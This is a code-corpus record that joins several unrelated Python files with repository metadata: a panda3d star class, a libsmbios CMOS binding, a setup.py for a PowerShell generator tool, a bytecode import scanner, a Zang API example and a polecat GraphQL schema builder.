] | null | null | null | star.py | caiovini/space-ship3d | d33383b199a6b01931ada9cc3405f69a6569d332 | [
"MIT"
] | null | null | null | from panda3d.core import NodePath, LineSegs
class Star():
def __init__(self):
self.np = NodePath('pen')
def create( self, pos):
segs = LineSegs()
segs.setThickness(1.0)
segs.moveTo( pos[0], pos[1], pos[2] - 1)
segs.setColor(255, 255, 255, 1)
segs.drawTo(pos)
return segs.create()
| 19.888889 | 48 | 0.553073 | 46 | 358 | 4.217391 | 0.543478 | 0.051546 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068826 | 0.310056 | 358 | 17 | 49 | 21.058824 | 0.716599 | 0 | 0 | 0 | 0 | 0 | 0.008427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8dd7db38433b8f032d7c1c8f92bc765aa0c4fa9 | 3,598 | py | Python | src/GaIA/pkgs/libsmbios/libsmbios-2.2.19/src/python/libsmbios_c/cmos.py | uninth/UNItools | c8b1fbfd5d3753b5b14fa19033e39737dedefc00 | [
"BSD-3-Clause"
] | null | null | null | src/GaIA/pkgs/libsmbios/libsmbios-2.2.19/src/python/libsmbios_c/cmos.py | uninth/UNItools | c8b1fbfd5d3753b5b14fa19033e39737dedefc00 | [
"BSD-3-Clause"
] | null | null | null | src/GaIA/pkgs/libsmbios/libsmbios-2.2.19/src/python/libsmbios_c/cmos.py | uninth/UNItools | c8b1fbfd5d3753b5b14fa19033e39737dedefc00 | [
"BSD-3-Clause"
] | 1 | 2021-06-08T15:59:26.000Z | 2021-06-08T15:59:26.000Z | # vim:tw=0:expandtab:autoindent:tabstop=4:shiftwidth=4:filetype=python:
#############################################################################
#
# Copyright (c) 2005 Dell Computer Corporation
# Dual Licenced under GNU GPL and OSL
#
#############################################################################
"""
cmos_obj:
python interface to functions in libsmbios_c obj/cmos.h
"""
# imports (alphabetical)
import ctypes
import exceptions
from libsmbios_c import libsmbios_c_DLL as DLL
from _common import errorOnNegativeFN, errorOnNullPtrFN
from trace_decorator import decorate, traceLog, getLog
__all__ = ["CmosAccess", "CMOS_DEFAULTS", "CMOS_GET_SINGLETON", "CMOS_GET_NEW", "CMOS_UNIT_TEST_MODE"]
CMOS_DEFAULTS =0x0000
CMOS_GET_SINGLETON =0x0001
CMOS_GET_NEW =0x0002
CMOS_UNIT_TEST_MODE=0x0004
decorate(traceLog())
def CmosAccess(flags=CMOS_GET_SINGLETON, factory_args=None):
if factory_args is None: factory_args = []
if _CmosAccess._instance is None:
_CmosAccess._instance = _CmosAccess( flags, *factory_args)
return _CmosAccess._instance
class _CmosAccess(ctypes.Structure):
_instance = None
decorate(traceLog())
def __init__(self, *args):
self._cmosobj = None
self._cmosobj = DLL.cmos_obj_factory(*args)
# dont decorate __del__
def __del__(self):
DLL.cmos_obj_free(self._cmosobj)
decorate(traceLog())
def readByte(self, offset, indexPort, dataPort):
buf = ctypes.c_uint8
DLL.cmos_obj_read(self._cmosobj, buf, offset, length)
return buf
decorate(traceLog())
def writeByte(self, offset, indexPort, dataPort):
DLL.cmos_obj_write(self._cmosobj, buf, offset, len(buf))
#// format error string
#const char *cmos_obj_strerror(const struct cmos_access_obj *m);
# define strerror first so we can use it in error checking other functions.
DLL.cmos_obj_strerror.argtypes = [ ctypes.POINTER(_CmosAccess) ]
DLL.cmos_obj_strerror.restype = ctypes.c_char_p
decorate(traceLog())
def _strerror(obj):
return Exception(DLL.cmos_obj_strerror(obj))
#struct cmos_access_obj *cmos_obj_factory(int flags, ...);
# dont define argtypes because this is a varargs function...
#DLL.cmos_obj_factory.argtypes = [ctypes.c_int, ]
DLL.cmos_obj_factory.restype = ctypes.POINTER(_CmosAccess)
DLL.cmos_obj_factory.errcheck = errorOnNullPtrFN(lambda r,f,a: _strerror(r))
#void cmos_obj_free(struct cmos_access_obj *);
DLL.cmos_obj_free.argtypes = [ ctypes.POINTER(_CmosAccess) ]
DLL.cmos_obj_free.restype = None
#int cmos_obj_read_byte(const struct cmos_access_obj *, u8 *byte, u32 indexPort, u32 dataPort, u32 offset);
DLL.cmos_obj_read_byte.argtypes = [ ctypes.POINTER(_CmosAccess), ctypes.POINTER(ctypes.c_uint8), ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32 ]
DLL.cmos_obj_read_byte.restype = ctypes.c_int
DLL.cmos_obj_read_byte.errcheck = errorOnNegativeFN(_strerror)
#int cmos_obj_write_byte(const struct cmos_access_obj *, u8 byte, u32 indexPort, u32 dataPort, u32 offset);
DLL.cmos_obj_write_byte.argtypes = [ ctypes.POINTER(_CmosAccess), ctypes.c_uint8, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32 ]
DLL.cmos_obj_write_byte.restype = ctypes.c_int
DLL.cmos_obj_write_byte.errcheck = errorOnNegativeFN(_strerror)
#// useful for checksums, etc
#typedef int (*cmos_write_callback)(const struct cmos_access_obj *, bool, void *);
#void cmos_obj_register_write_callback(struct cmos_access_obj *, cmos_write_callback, void *, void (*destruct)(void *));
#int cmos_obj_run_callbacks(const struct cmos_access_obj *m, bool do_update);
| 37.479167 | 148 | 0.72985 | 485 | 3,598 | 5.076289 | 0.286598 | 0.073924 | 0.073111 | 0.061738 | 0.285134 | 0.242486 | 0.169781 | 0.136474 | 0.111292 | 0.111292 | 0 | 0.017943 | 0.132574 | 3,598 | 95 | 149 | 37.873684 | 0.770907 | 0.322679 | 0 | 0.106383 | 0 | 0 | 0.031943 | 0 | 0 | 0 | 0.010648 | 0 | 0 | 1 | 0.12766 | false | 0 | 0.106383 | 0.021277 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8ddae265d9b0bb9c7857ab422d8753d658f3928 | 1,141 | py | Python | setup.py | bongtrop/psgen | e759d2231df9da4201e64c1d8e1a97c4231f58eb | [
"MIT"
] | 13 | 2020-06-07T18:06:48.000Z | 2020-09-17T03:29:04.000Z | setup.py | bongtrop/psgen | e759d2231df9da4201e64c1d8e1a97c4231f58eb | [
"MIT"
] | null | null | null | setup.py | bongtrop/psgen | e759d2231df9da4201e64c1d8e1a97c4231f58eb | [
"MIT"
] | 3 | 2020-06-09T15:50:39.000Z | 2022-02-25T11:24:58.000Z | #/usr/bin/env python
#-*- coding:utf-8 -*-
from setuptools import setup, find_packages
import psgen
import os
datadir = os.path.join('payload')
datafiles = [(d, [os.path.join(d,f) for f in files])
for d, folders, files in os.walk(datadir)]
setup(name=psgen.__name__,
version=psgen.__version__,
author='Pongsakorn Sommalai',
author_email='bongtrop@gmail.com',
license='MIT',
url='https://github.com/bongtrop/psgen',
description=psgen.__doc__,
long_description=open("README.md").read(),
packages=['psgen'],
include_package_data = True,
install_requires=[
"pyyaml",
"tabulate",
"Jinja2",
"ps_minifier @ git+https://github.com/jusmistic/ps-minifier"
],
entry_points="""
[console_scripts]
psgen=psgen:main
""",
keywords=['powershell', 'tool', 'hack'],
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Other Audience',
'License :: OSI Approved :: MIT License',
'Topic :: Utilities',
'Programming Language :: Python :: 3']
)
| 27.166667 | 68 | 0.595968 | 124 | 1,141 | 5.314516 | 0.677419 | 0.018209 | 0.030349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004695 | 0.253287 | 1,141 | 41 | 69 | 27.829268 | 0.768779 | 0.034181 | 0 | 0 | 0 | 0 | 0.368182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.088235 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e0ba99ac26f1b721d8b12e685abc61364a4ef9 | 5,778 | py | Python | src/compage/introspection.py | alok1974/compage | 4b8875a225b37dd9ca3a14dfdad9b66177fe6d64 | [
"MIT"
] | 1 | 2021-03-01T20:25:29.000Z | 2021-03-01T20:25:29.000Z | src/compage/introspection.py | alok1974/compage | 4b8875a225b37dd9ca3a14dfdad9b66177fe6d64 | [
"MIT"
] | null | null | null | src/compage/introspection.py | alok1974/compage | 4b8875a225b37dd9ca3a14dfdad9b66177fe6d64 | [
"MIT"
] | null | null | null | """Code Introspection Utilities"""
import os
import struct
import itertools
import dis
import collections
__all__ = ['ImportScanner', 'ImportFinder']
class Opname(object):
LOAD_CONST = chr(dis.opname.index('LOAD_CONST'))
IMPORT_NAME = chr(dis.opname.index('IMPORT_NAME'))
STORE_NAME = chr(dis.opname.index('STORE_NAME'))
STORE_GLOBAL = chr(dis.opname.index('STORE_GLOBAL'))
STORE_OPS = [STORE_NAME, STORE_GLOBAL]
HAVE_ARGUMENT = chr(dis.HAVE_ARGUMENT)
# Adapted from stdlib 'modulefinder'
class ImportScanner(object):
"""Scanner for extracting `import` statement in the source code"""
def __init__(self, pathname):
super(ImportScanner, self).__init__()
self._code = self._get_code_oject(pathname)
self._source = self._get_source_code(pathname)
self._imports = None
@property
def imports(self):
if self._imports is None:
self._imports = []
self._scan_code(self._code)
return self._imports
def _get_source_code(self, pathname):
source = None
with open(pathname, 'r') as fp:
source = dict(enumerate(fp.readlines()))
return source
def _get_code_oject(self, pathname):
code = None
with open(pathname, 'r') as fp:
code = compile(fp.read() + '\n', pathname, 'exec')
return code
def _scanner(self, co):
code = co.co_code
names = co.co_names
consts = co.co_consts
LOAD_AND_IMPORT = (
Opname.LOAD_CONST
+ Opname.LOAD_CONST
+ Opname.IMPORT_NAME
)
i = 0
while code:
c = code[0]
if c in Opname.STORE_OPS:
oparg, = struct.unpack('<H', code[1:3])
yield "store", (i, names[oparg],)
code = code[3:]
i += 3
continue
if code[:9:3] == LOAD_AND_IMPORT:
oparg_1, oparg_2, oparg_3 = struct.unpack('<xHxHxH', code[:9])
level = consts[oparg_1]
if level == -1: # normal import
yield "import", (i, consts[oparg_2], names[oparg_3])
elif level == 0: # absolute import
yield "absolute_import", (
i, consts[oparg_2], names[oparg_3])
else: # relative import
yield "relative_import", (
i, level, consts[oparg_2], names[oparg_3])
code = code[9:]
i += 9
continue
if c >= Opname.HAVE_ARGUMENT:
code = code[3:]
i += 3
else:
code = code[1:]
i += 1
def _scan_code(self, co):
for what, args in self._scanner(co):
addr = args[0]
args = args[1:]
lineno = self._addr_to_lineno(co, addr)
line = None
if lineno:
line = self._source.get(lineno - 1)
if what == "store":
name, = args
elif what in ("import", "absolute_import"):
fromlist, name = args
if fromlist is not None:
fromlist = filter(lambda f: f != '*', fromlist)
if what == "absolute_import":
level = 0
else:
level = -1
self._import_hook(lineno, line, name, fromlist)
elif what == "relative_import":
level, fromlist, name = args
if name:
self._import_hook(lineno, line, name, fromlist)
else:
# We don't expect anything else from the generator.
raise RuntimeError(what)
for c in co.co_consts:
if isinstance(c, type(co)):
self._scan_code(c)
def _import_hook(self, lineno, line, name, fromlist):
self._imports.append((lineno, line, name, fromlist))
def _addr_to_lineno(self, co, addr):
return dict(self._addr_line_map(co)).get(addr)
def _addr_line_map(self, co):
def pairwise(iterable):
a = iter(iterable)
return itertools.izip(a, a)
last_line_num = None
line_num = co.co_firstlineno
byte_num = 0
for byte_incr, line_incr in pairwise(map(ord, co.co_lnotab)):
if byte_incr:
if line_num != last_line_num:
yield (byte_num, line_num)
last_line_num = line_num
byte_num += byte_incr
line_num += line_incr
if line_num != last_line_num:
yield (byte_num, line_num)
class ImportFinder(object):
""""Finds imports for a package"""
def __init__(self, package_root):
self._package_root = package_root
self._import_data = None
@property
def import_data(self):
if self._import_data is None:
self._import_data = self._get_imports()
return self._import_data
def _get_imports(self):
imports = {}
for dirpath, dirnames, filenames in os.walk(self._package_root):
for filename in filenames:
if not filename.endswith('.py'):
continue
file_path = os.path.join(dirpath, filename)
file_imports = ImportScanner(file_path).imports
for (lineno, line, name, _) in file_imports:
top_level_name = name.split('.', 1)[0]
imports.setdefault(
top_level_name,
collections.defaultdict(list)
)[file_path].append((lineno, line))
return imports
| 33.398844 | 78 | 0.529768 | 654 | 5,778 | 4.437309 | 0.215596 | 0.026533 | 0.024121 | 0.023432 | 0.135424 | 0.100276 | 0.09235 | 0.05031 | 0.029635 | 0.029635 | 0 | 0.009645 | 0.371928 | 5,778 | 172 | 79 | 33.593023 | 0.790025 | 0.043268 | 0 | 0.144828 | 0 | 0 | 0.033951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089655 | false | 0 | 0.268966 | 0.006897 | 0.468966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e10ebf4a1ecfea536bbf6435217933c9e044fd | 846 | py | Python | docs/examples/available_phone_numbers_example.py | vlastikczech/zang-python | 980f5243071404d6838554500a6955ff7bc2a0c7 | [
"MIT"
] | null | null | null | docs/examples/available_phone_numbers_example.py | vlastikczech/zang-python | 980f5243071404d6838554500a6955ff7bc2a0c7 | [
"MIT"
] | null | null | null | docs/examples/available_phone_numbers_example.py | vlastikczech/zang-python | 980f5243071404d6838554500a6955ff7bc2a0c7 | [
"MIT"
] | null | null | null | from zang.exceptions.zang_exception import ZangException
from zang.configuration.configuration import Configuration
from zang.connectors.connector_factory import ConnectorFactory
from zang.domain.enums.available_number_type import AvailableNumberType
from docs.examples.credentials import sid, authToken
url = 'http://api.zang.io/v2'
configuration = Configuration(sid, authToken, url=url)
availablePhoneNumbersConnector = ConnectorFactory(
configuration).availablePhoneNumbersConnector
try:
numbers = availablePhoneNumbersConnector.listAvailablePhoneNumbers(
country="HR",
type_=AvailableNumberType.TOLLFREE,
contains="123",
areaCode="052",
inRegion="Istria",
inPostalCode="52210",
page=0,
pageSize=20)
print(numbers.total)
except ZangException as ze:
print(ze)
| 31.333333 | 71 | 0.760047 | 82 | 846 | 7.780488 | 0.621951 | 0.050157 | 0.047022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021097 | 0.159574 | 846 | 26 | 72 | 32.538462 | 0.876231 | 0 | 0 | 0 | 0 | 0 | 0.047281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.227273 | 0 | 0.227273 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e2595b5bc5ce59dcbb7ca5c7d7107c02325fa1 | 20,931 | py | Python | polecat/graphql/schema.py | furious-luke/polecat | 7be5110f76dc42b15c922c1bb7d49220e916246d | [
"MIT"
] | 4 | 2019-08-10T12:56:12.000Z | 2020-01-21T09:51:20.000Z | polecat/graphql/schema.py | furious-luke/polecat | 7be5110f76dc42b15c922c1bb7d49220e916246d | [
"MIT"
] | 71 | 2019-04-09T05:39:21.000Z | 2020-05-16T23:09:24.000Z | polecat/graphql/schema.py | furious-luke/polecat | 7be5110f76dc42b15c922c1bb7d49220e916246d | [
"MIT"
] | null | null | null | import inspect
import logging
from functools import partial
from graphql.type import (GraphQLField, GraphQLInputField,
GraphQLInputObjectType, GraphQLInt, GraphQLList,
GraphQLNonNull, GraphQLObjectType, GraphQLSchema,
GraphQLString)
from polecat.model import default_blueprint
from ..core.context import active_context
from ..model import Model, omit
from ..utils import add_attribute, capitalize, uncapitalize
from ..utils.stringcase import camelcase
# from .field import * # noqa
from .registry import (add_graphql_create_input, add_graphql_type,
add_graphql_update_input, graphql_create_input_registry,
graphql_field_registry, graphql_reverse_input_registry,
graphql_type_registry, graphql_update_input_registry)
from .resolve import (resolve_all_query, resolve_create_mutation,
resolve_delete_mutation, resolve_get_query,
resolve_mutation, resolve_query, resolve_update_mutation,
resolve_update_or_create_mutation)
from .type import scalars, GraphQLJSON
logger = logging.getLogger(__name__)
def build_graphql_schema():
# TODO: I need to fix this nonsense. The registries need to be
# first-class citizens that can be cleared when needed.
global graphql_create_input_registry
global graphql_update_input_registry
global graphql_reverse_input_registry
all_keys = list(graphql_create_input_registry.keys())
for k in all_keys:
del graphql_create_input_registry[k]
all_keys = list(graphql_update_input_registry.keys())
for k in all_keys:
del graphql_update_input_registry[k]
all_keys = list(graphql_reverse_input_registry.keys())
for k in all_keys:
del graphql_reverse_input_registry[k]
return SchemaBuilder().build()
# TODO: Make the builders class only?
class SchemaBuilder:
def build(self):
logger.debug('Building GraphQL schema')
self.post_build_hooks = []
self.types = []
self.queries = {}
self.mutations = {}
self.build_models()
self.build_queries()
self.build_mutations()
self.run_post_build_hooks()
return GraphQLSchema(
query=GraphQLObjectType(
name='Query',
fields=self.queries
),
mutation=GraphQLObjectType(
name='Mutation',
fields=self.mutations
) if self.mutations else None,
types=scalars + self.types
)
# TODO: Should have called this "delete_input_type".
@property
def delete_type(self):
return self.build_delete_type()
@property
def delete_output_type(self):
return self.build_delete_output_type()
def build_models(self):
logger.debug('Building GraphQL models')
builders = []
for model in self.iter_models():
builder_class = getattr(model.Meta, 'builder', ModelBuilder)
builder = builder_class(self)
builder.build(model)
builders.append(builder)
for builder in builders:
builder.post_build(self)
def build_queries(self):
logger.debug('Building GraphQL queries')
for query in self.iter_queries():
builder_class = getattr(query, 'builder', QueryBuilder)
builder = builder_class(self)
builder.build(query)
def build_mutations(self):
logger.debug('Building GraphQL mutations')
for mutation in self.iter_mutations():
builder_class = getattr(mutation, 'builder', MutationBuilder)
builder = builder_class(self)
builder.build(mutation)
def iter_models(self):
for type in default_blueprint.iter_types():
if not type.Meta.omit == omit.ALL:
yield type
for model in default_blueprint.iter_models():
if not model.Meta.omit == omit.ALL:
yield model
def iter_queries(self):
for query in default_blueprint.iter_queries():
yield query
def iter_mutations(self):
for mutation in default_blueprint.iter_mutations():
yield mutation
def build_delete_type(self):
# TODO: Use a function cache.
type = getattr(self, '_delete_type', None)
if not type:
type = GraphQLInputObjectType(
name='DeleteByIDInput',
fields={
'id': GraphQLInputField(GraphQLInt)
}
)
self._delete_type = type
return type
def build_delete_output_type(self):
# TODO: Use a function cache.
type = getattr(self, '_delete_output_type', None)
if not type:
type = GraphQLObjectType(
name='DeleteByID',
fields={
'id': GraphQLField(GraphQLInt)
}
)
self._delete_output_type = type
return type
def run_post_build_hooks(self):
for hook in self.post_build_hooks:
hook()
class ModelBuilder:
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, model):
self.model = model
self.type = self.build_type(model)
self.schema_builder.types.append(self.type)
# TODO: Can remove `schema_builder`?
def post_build(self, schema_builder):
if issubclass(self.model, Model):
schema_builder.queries.update(self.build_queries(self.model, self.type))
schema_builder.mutations.update(self.build_mutations(self.model, self.type))
def build_type(self, model):
if getattr(model.Meta, 'input', False):
return InputBuilder(self.schema_builder).build(model)
else:
return TypeBuilder(self.schema_builder).build(model)
def build_queries(self, model, type):
# TODO: Add the model to the GraphQLField?
return {
**self.build_all_queries(model, type),
**self.build_get_queries(model, type)
}
def build_mutations(self, model, type):
mutations = {}
if not model.Meta.omit & omit.CREATE:
args = {}
create_input = CreateInputBuilder(self.schema_builder).build(model)
if create_input:
args['input'] = create_input
mutations[self.create_mutation_inflection(model)] = GraphQLField(
type,
args,
resolve_create_mutation
)
if not model.Meta.omit & omit.UPDATE:
args = {
'id': GraphQLNonNull(GraphQLInt)
}
update_input = UpdateInputBuilder(self.schema_builder).build(model)
if update_input:
args['input'] = update_input
mutations[self.update_mutation_inflection(model)] = GraphQLField(
type,
args,
resolve_update_mutation
)
if not model.Meta.omit & omit.UPDATE and not model.Meta.omit & omit.CREATE:
args = {
'id': GraphQLInt
}
if update_input:
args['input'] = update_input
mutations[self.update_or_create_mutation_inflection(model)] = GraphQLField(
type,
args,
resolve_update_or_create_mutation
)
if not model.Meta.omit & omit.DELETE:
# TODO: Need to use type instead of delete_output_type
# because it contains details about the model class
# used. Will need to think about how to handle situations
# where a type is shared amongst numerous models.
mutations[self.delete_mutation_inflection(model)] = GraphQLField(
type,
{
'input': DeleteInputBuilder(self.schema_builder).build(model)
},
resolve_delete_mutation
)
return mutations
def build_all_queries(self, model, type):
queries = {}
if not model.Meta.omit & omit.LIST:
queries[self.all_query_inflection(model)] = GraphQLField(
GraphQLList(type),
resolve=resolve_all_query
)
return queries
def build_get_queries(self, model, type):
queries = {}
if not model.Meta.omit & omit.GET:
# TODO: Need to add some details to the field to support
# getting by?
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.GET:
continue
if not field.use_get_query():
continue
queries[self.get_query_inflection(model, field)] = add_attribute(
GraphQLField(
type,
{
# TODO: What happens when the type linked is
# something complicated, like a GraphQLObject?
# Will need to use the PK of the
# relationship. What if there's several?
name: type.fields[name].type
},
resolve=resolve_get_query
),
'_type', type
)
return queries
def all_query_inflection(self, model):
# TODO: Not sure I need to capitalize?
return f'all{model.Meta.plural}'
def get_query_inflection(self, model, field):
name = f'get{model.Meta.name}'
if not field.primary_key:
name += f'By{capitalize(field.cc_name)}'
return name
def create_mutation_inflection(self, model):
return f'create{model.Meta.name}'
def update_mutation_inflection(self, model):
return f'update{model.Meta.name}'
def update_or_create_mutation_inflection(self, model):
return f'updateOrCreate{model.Meta.name}'
def delete_mutation_inflection(self, model):
return f'delete{model.Meta.name}'
class TypeBuilder:
object_type_class = GraphQLObjectType
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, model):
object_type_class = self.get_object_type_class()
# TODO: Description?
type = add_attribute(
object_type_class(
name=self.get_type_name(model),
fields=partial(self.build_all_fields, model)
),
'_model', model
)
# TODO: Current assumption is that there's just one gql type
# per model. May need to alter this in the future. I'm not
# storing any of the model create, update, etc inputs.
self.register_type(model, type)
return type
def get_type_name(self, model):
return model.Meta.name
def build_all_fields(self, model):
logger.debug(f'Building GraphQL fields for model {model.Meta.name} using builder {self.__class__.__name__}')
# TODO: Can I make this more functional?
fields = {}
for name, field in self.iter_fields(model):
result = self.build_field(model, field)
if isinstance(result, dict):
fields.update(result)
elif result is None:
pass
else:
fields[name] = result
self.add_hooks_from_field(model, field, name)
return fields
def add_hooks_from_field(self, model, field, field_name):
hooks = field.graphql_post_build_hooks
self.schema_builder.post_build_hooks.extend([
partial(h, self.schema_builder, model, field, field_name)
for h in hooks
])
def build_field(self, model, field):
for base_class in inspect.getmro(field.__class__):
my_graphql_field = graphql_field_registry.get(base_class)
# TODO: Nomenclature mishap here. Need a name for my
# GraphQL type abstraction that doesn't clash with actual
# graphql types.
if my_graphql_field:
logger.debug(f'Building field {field.cc_name}')
field = self.get_graphql_field(model, field, my_graphql_field)
logger.debug('DONE')
return field
raise Exception(f'unknown field type {field}')
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
return my_graphql_field(model, field).make_graphql_field(self.schema_builder)
def get_object_type_class(self):
return self.object_type_class
def register_type(self, model, type):
add_graphql_type(model, type)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & (omit.LIST | omit.GET):
continue
yield name, field
class InputBuilder(TypeBuilder):
object_type_class = GraphQLInputObjectType
def get_type_name(self, model):
# TODO: Probably shouldn't need this conditional.
name = model.Meta.name
if name[-5:] != 'Input':
name += 'Input'
return name
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
return my_graphql_field(model, field, input=True).make_graphql_field(self.schema_builder)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
yield name, field
class CreateInputBuilder(InputBuilder):
def get_type_name(self, model):
return f'{model.Meta.name}CreateInput'
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
# TODO: Have to pass in a type because reverse fields generate
# a new object-type internally instead of just a type, so it
# needs a name. So, if I don't pass in a type string create,
# update, delete will produce identically named object-types.
return my_graphql_field(
model,
field,
input=True,
registry=graphql_create_input_registry # TODO: Yuck
).make_graphql_field(self.schema_builder)
def register_type(self, model, type):
add_graphql_create_input(model, type)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.CREATE:
continue
yield name, field
class UpdateInputBuilder(InputBuilder):
def get_type_name(self, model):
return f'{model.Meta.name}UpdateInput'
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
# TODO: Check if it's not the ID field used for the update,
# and if not, make the field optional.
# TODO: Have to pass in a type because reverse fields generate
# a new object-type internally instead of just a type, so it
# needs a name. So, if I don't pass in a type string create,
# update, delete will produce identically named object-types.
return my_graphql_field(
model,
field,
input=True,
registry=graphql_update_input_registry # TODO: Yuck
).make_graphql_field(self.schema_builder)
def register_type(self, model, type):
add_graphql_update_input(model, type)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.UPDATE:
continue
if name == 'id':
continue
yield name, field
class DeleteInputBuilder(InputBuilder):
def build(self, model):
object_type_class = self.get_object_type_class()
# TODO: Description?
type = add_attribute(
object_type_class(
name=self.get_type_name(model),
fields={
'id': GraphQLInt
}
),
'_model', model
)
# TODO: Current assumption is that there's just one gql type
# per model. May need to alter this in the future. I'm not
# storing any of the model create, update, etc inputs.
# self.register_type(model, type)
return type
def get_type_name(self, model):
return f'{model.Meta.name}DeleteInput'
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.DELETE:
continue
yield name, field
class ReverseModelInputBuilder(InputBuilder):
def build(self, model, source_field):
# TODO: Do I need to pass source_field around, or okay to
# store on the builder?
self.source_field = source_field
logger.debug(f'Building GraphQL reverse model input {self.get_type_name(model)}')
return super().build(model)
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
# TODO: Check if it's not the ID field used for the update,
# and if not, make the field optional.
# TODO: Have to pass in a type because reverse fields generate
# a new object-type internally instead of just a type, so it
# needs a name. So, if I don't pass in a type string create,
# update, delete will produce identically named object-types.
return my_graphql_field(
model,
field,
input=True,
registry=graphql_create_input_registry # TODO: Yuck
).make_graphql_field(self.schema_builder)
def get_type_name(self, model):
return f'{model.Meta.name}{capitalize(self.source_field.cc_name)}ReverseInput'
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field != self.source_field:
yield name, field
class QueryBuilder:
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, query):
self.schema_builder.queries.update(self.build_queries(query))
def build_queries(self, query):
queries = {}
if not query.Meta.omit & omit.ALL:
queries[self.query_inflection(query)] = add_attribute(
GraphQLField(
self.build_return_type(query),
self.build_arguments(query),
resolve_query
),
'_query', query
)
return queries
def build_return_type(self, query):
if isinstance(query.returns, list):
return GraphQLList(graphql_type_registry[query.returns[0]])
else:
return graphql_type_registry[query.returns]
def build_arguments(self, query):
args = {}
for name, type in getattr(query, 'arguments', ()):
# TODO: This should be looking up from a table.
args[camelcase(name)] = self.map_type(type)
return args
def map_type(self, type):
if type == str:
return GraphQLString
elif type == int:
return GraphQLInt
elif type == dict:
return GraphQLJSON
else:
raise NotImplementedError(f'invalid GraphQL argument: {type}')
def query_inflection(self, query):
return uncapitalize(query.Meta.name)
class MutationBuilder:
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, mutation):
self.schema_builder.mutations.update(self.build_mutations(mutation))
def build_mutations(self, mutation):
mutations = {}
if not mutation.omit & omit.ALL:
mutations[self.mutation_inflection(mutation)] = add_attribute(
GraphQLField(
self.build_return_type(mutation),
{
'input': graphql_type_registry[mutation.input]
} if mutation.input else None,
resolve_mutation
),
'_mutation', mutation
)
return mutations
def mutation_inflection(self, mutation):
return uncapitalize(mutation.name)
def build_return_type(self, mutation):
if isinstance(mutation.returns, list):
return GraphQLList(graphql_type_registry[mutation.returns[0]])
else:
return graphql_type_registry[mutation.returns]
| 36.150259 | 116 | 0.605848 | 2,398 | 20,931 | 5.084237 | 0.109675 | 0.031004 | 0.033465 | 0.010499 | 0.487123 | 0.414534 | 0.383694 | 0.328986 | 0.29831 | 0.29831 | 0 | 0.00021 | 0.316564 | 20,931 | 578 | 117 | 36.212803 | 0.85208 | 0.134298 | 0 | 0.318078 | 0 | 0.002288 | 0.047018 | 0.01966 | 0 | 0 | 0 | 0.00173 | 0 | 1 | 0.153318 | false | 0.002288 | 0.02746 | 0.048055 | 0.315789 | 0.011442 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
